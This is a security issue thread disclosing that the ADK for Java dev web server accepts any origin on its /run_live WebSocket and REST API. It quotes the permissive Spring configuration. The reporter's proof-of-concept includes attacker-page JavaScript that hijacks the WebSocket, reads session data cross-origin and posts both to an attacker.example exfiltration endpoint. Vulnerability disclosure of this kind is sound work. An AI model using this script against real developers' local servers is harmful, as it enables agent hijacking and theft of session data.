ADK dev web server allows all origins on the /run_live WebSocket and on the REST API, enabling cross-site WebSocket hijacking and cross-origin data theft

[geo-chen]

The ADK for Java dev web server (the local "adk web" UI / REST API a developer runs to interact with an agent) accepts requests from any origin on both its WebSocket and its REST API, and it has no authentication. The /run_live WebSocket handler is registered with setAllowedOrigins("*"), which disables the server-side origin check, and the REST CORS configuration defaults to origins = List.of("*"). As a result, any website a developer visits while the dev server is running can, with no DNS rebinding and no credentials: open the /run_live WebSocket and drive the agent (send turns that trigger the agent's tools and read the streamed responses), and read the REST API responses cross-origin (list/read sessions, read artifacts, run output).

Unlike the equivalent issue in ADK for Go (where the WebSocket relies on the framework's default same-origin check and a browser attack requires DNS rebinding), here the wildcard origin is explicit, so a plain cross-origin connection from any page succeeds.

[hemasekhar-p]

Hi @geo-chen, Thank you for reporting this issue. If you are not using latest version, we recommend using latest version v1.4.0 and if you are still observing same, Please share more details of the issue like minimal reproducible steps and reproducible example along with the error logs and output? Having this information will help use to investigate further and provide the resolution.

[geo-chen]

Hey @hemasekhar-p it was using the 1.4.1 snapshot.
Here goes the details:

Details

WebSocket, dev/src/main/java/com/google/adk/web/websocket/WebSocketConfig.java:

@Override
public void registerWebSocketHandlers(WebSocketHandlerRegistry registry) {
    registry.addHandler(liveWebSocketHandler, "/run_live").setAllowedOrigins("*");  // accepts any Origin
}

Spring's setAllowedOrigins("*") installs an origin handshake interceptor that allows every Origin, so the server completes the WebSocket handshake for a request initiated by any web page. The handler drives the agent: LiveWebSocketHandler (dev/.../websocket/LiveWebSocketHandler.java) extends TextWebSocketHandler, parses each text message into a LiveRequest, feeds a LiveRequestQueue, and calls runnerService / Runner.runLive(session, liveRequests, modalities), streaming Events back over the socket. So an attacker who opens the socket can submit turns to the agent and read its responses.

REST CORS, dev/src/main/java/com/google/adk/web/config/AdkWebCorsProperties.java:

public AdkWebCorsProperties {
    mapping = mapping != null ? mapping : "/**";
    origins = origins != null && !origins.isEmpty() ? origins : List.of("*");   // default: all origins
    methods = ... List.of("GET", "POST", "PUT", "DELETE", "OPTIONS");
    headers = ... List.of("*");
    ...
}

dev/src/main/java/com/google/adk/web/config/AdkWebCorsConfig.java:

CorsConfiguration configuration = new CorsConfiguration();
configuration.setAllowedOrigins(corsProperties.origins());      // ["*"]
configuration.setAllowedMethods(corsProperties.methods());
configuration.setAllowedHeaders(corsProperties.headers());
configuration.setAllowCredentials(corsProperties.allowCredentials());  // false by default
configuration.setMaxAge(corsProperties.maxAge());
source.registerCorsConfiguration(corsProperties.mapping(), configuration);  // "/**"

With Access-Control-Allow-Origin: * and no authentication on the dev server, a cross-origin page can issue non-credentialed fetch requests to the REST endpoints and read the responses: the session endpoints (/apps/{appName}/users/{userId}/sessions...), the artifact endpoints (/apps/.../artifacts/{artifactName}), and the run endpoints (/run, /run_sse). There is no Spring Security configuration or authentication filter in the dev module.

The server binds localhost by default (Maven WebMojo host defaults to localhost), but that does not prevent the attack: a malicious page in the developer's browser can reach http://localhost:<port> / ws://localhost:<port> directly, and both the WebSocket origin allowlist (*) and the REST CORS allowlist (*) permit it cross-origin.

This is the Java counterpart of the ADK for Go /run_live exposure, but more directly exploitable: the Go server uses gorilla/websocket's default same-origin check (so a browser attack needs DNS rebinding), whereas here the explicit setAllowedOrigins("*") accepts any origin outright. The Go /run_live agent-driving chain was confirmed at runtime; the Java handler uses the same Runner.runLive flow.

PoC

Preconditions: a developer is running the ADK Java dev web server (for example mvn google-adk:web -Dagents=...) on localhost:8080, and visits an attacker page in the same browser.

Attacker page JavaScript:

<script>
// 1) Cross-site WebSocket hijacking: drive the agent and read its responses.
const ws = new WebSocket("ws://localhost:8080/run_live?appName=<app>&userId=<user>&sessionId=<sid>");
ws.onopen = () => ws.send(JSON.stringify({ /* a LiveRequest: a user turn / content */ }));
ws.onmessage = (e) => fetch("https://attacker.example/exfil", { method: "POST", body: e.data }); // stream agent output out

// 2) Permissive CORS: read REST data cross-origin (no credentials needed; dev server has no auth).
fetch("http://localhost:8080/apps/<app>/users/<user>/sessions")
  .then(r => r.text())
  .then(d => fetch("https://attacker.example/exfil", { method: "POST", body: d })); // session data
</script>

The WebSocket handshake is accepted because the handler allows origin *; the REST response is readable because Access-Control-Allow-Origin: * is returned and the request carries no credentials.

Live validation (against the exact pinned Spring Framework 7.0.2, from Spring Boot 4.0.2): replicating the two config objects this code builds and exercising the real Spring classes:

• CorsConfiguration with setAllowedOrigins(List.of("*")) and setAllowCredentials(false) returns "*" from checkOrigin("http://evil.com") (the browser is allowed to read the cross-origin response).
• OriginHandshakeInterceptor(List.of("*")) returns true from beforeHandshake(...) for a request with Origin: http://evil.com (the WebSocket handshake is accepted). The contrast OriginHandshakeInterceptor(List.of("http://localhost:8080")) returns false for the same Origin, confirming the check is real and that "*" is what disables it.

[hemasekhar-p]

Hey @geo-chen, Thank you for the detailed information. Currently this Issue is under review by our team, we will keep you update if any additional information is required. thank you.

[hemasekhar-p]

@anFatum, Please take a look into it.